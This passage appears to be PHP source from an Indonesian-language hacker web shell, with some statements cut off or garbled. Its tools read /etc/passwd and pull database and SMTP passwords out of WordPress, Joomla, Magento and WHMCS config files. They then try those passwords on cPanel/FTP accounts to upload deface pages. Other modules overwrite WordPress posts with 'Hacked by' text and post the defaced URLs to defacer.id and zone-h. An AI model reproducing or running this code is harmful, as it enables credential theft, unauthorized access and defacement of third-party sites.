$passcp = explode(" ", $_POST['pass_cp']);
$i = 0;
foreach
foreach
if
if
} else {
$_SESSION[$ucp] = "1";
$_SESSION[$pcp] = "1";
if
//
} else {
echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>"
$ftp_conn = ftp_connect($ip);
$ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
if
echo "[+] <font color=red>Login Gagal</font><br><br>"
} else {
echo "[+] <font color=lime>Login Sukses</font><br>"
$fi = htmlspecialchars($_POST['file_deface']);
$deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
if
$i++;
echo "[+] <font color=lime>Deface Sukses</font><br>"
if
$domain_cp = file_get_contents("/etc/named.conf");
if
echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>"
} else {
preg_match_all
foreach
$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_cp_url = $user_cp_url['name'];
if
echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>" ;
break
}
}
}
} else {
echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>"
}
} else {
echo "[-] <font color=red>Deface Gagal</font><br><br>"
}
}
//echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
}
}
}
}
}
if
} else {
echo "<br>sukses deface " .
}
} else {
echo
<form method='post'>
Filename
<input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
Deface Page
<input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
user
<textarea style='width: 450px; height: 150px;' name='user_cp'>";
$_usercp = fopen("/etc/passwd","r");
while
if
echo "<font color=red>Can't read /etc/passwd</font>"
} else {
preg_match_all
foreach
if
echo
}
}
}
}
echo
PASS
<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
function cp_pass
$pass = "";
$dira = scandir($dir);
foreach
if
$ambil = file_get_contents("$dir/$dirb");
if
$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")." ";
} elseif(preg_match("/JConfig|joomla/", $ambil)) {
$pass .= ambilkata($ambil,"password = '","'")." ";
} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")." ";
} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
$pass .= ambilkata($ambil,'password = "','"')." ";
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")." ";
} elseif(preg_match("/client/", $ambil)) {
preg_match
if
$pass1[1] = str_replace('"', "", $pass1[1]);
$pass .= $pass1[1]." ";
}
} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
$pass .= ambilkata($ambil,"db_password = '","'")." ";
}
}
echo
}
$cp_pass = cp_pass($dir);
echo
echo
<input type='submit' name='crack' style='width: 450px;' value='Hajar'>
</form>
<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
}
} elseif($_GET['do'] == 'smtp') {
echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>"
function scj
$dira = scandir($dir);
foreach
if
$ambil = file_get_contents("$dir/$dirb");
$ambil = str_replace("$", "", $ambil);
if
$smtp_host = ambilkata($ambil,"smtphost = '","'");
$smtp_auth = ambilkata($ambil,"smtpauth = '","'");
$smtp_user = ambilkata($ambil,"smtpuser = '","'");
$smtp_pass = ambilkata($ambil,"smtppass = '","'");
$smtp_port = ambilkata($ambil,"smtpport = '","'");
$smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
echo "SMTP Host: <font color=lime>$smtp_host</font><br>"
echo "SMTP port: <font color=lime>$smtp_port</font><br>"
echo "SMTP user: <font color=lime>$smtp_user</font><br>"
echo "SMTP pass: <font color=lime>$smtp_pass</font><br>"
echo "SMTP auth: <font color=lime>$smtp_auth</font><br>"
echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>"
}
}
}
$smpt_hunter = scj($dir);
echo
} elseif($_GET['do'] == 'auto_wp') {
if
$title = htmlspecialchars($_POST['new_title']);
$pn_title = str_replace(" ", "-", $title);
if
$script = $_POST['edit_content'];
} else {
$script = $title;
}
$conf = $_POST['config_dir'];
$scan_conf = scandir($conf);
foreach
if
$config = file_get_contents("$conf/$file_conf");
if
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."posts";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
$update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
$update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
echo "<div style='margin: 5px auto;'>"
if
echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> "
} else {
echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> "
}
if
echo "<font color=red>MySQL Error: " .mysql_error
} else {
echo "<font color=lime>sukses di ganti.</font><br>"
}
echo "</div>"
mysql_close
}
}
} else {
echo
<h1>Auto Edit Title+Content WordPress</h1>
<form method='post'>
DIR Config
<input type='text' size='50' name='config_dir' value='$dir'><br><br>
Set Title
<input type='text' name='new_title' value='Hacked by global network' placeholder='New Title'><br><br>
Edit Content
<span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
<textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'>




NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

";
}
}elseif($_GET['do'] == 'defacerid') {
echo
Defacer: 



Team: 



Domains: 




";
$site = explode(" ", $_POST['sites']);
$go = $_POST['go'];
$hekel = $_POST['hekel'];
$tim = $_POST['tim'];
if
foreach
$zh = $sites;
$form_url = "https://www.defacer.id/notify";
$data_to_post = array();
$data_to_post['attacker'] = "$hekel";
$data_to_post['team'] = "$tim";
$data_to_post['poc'] = 'SQL Injection';
$data_to_post['url'] = "$zh";
$curl = curl_init();
curl_setopt
curl_setopt
curl_setopt ($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
curl_setopt
curl_setopt
curl_setopt ($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
$result = curl_exec($curl);
echo
curl_close
echo "
"
}
}
} elseif($_GET['do'] == 'zoneh') {
if
$domain = explode(" ", $_POST['url']);
$nick = $_POST['nick'];
echo "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0
" ;
echo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick

" ;
function zoneh
$ch = curl_init("http://www.zone-h.com/notify/single");
curl_setopt
curl_setopt
curl_setopt
return curl_exec
curl_close
}
foreach
$zoneh = zoneh($url,$nick);
if
echo "$url -> OK
"
} else {
echo "$url -> ERROR
"
}
}
} else {
echo
Defacer: 



Domains: 




";
}
echo "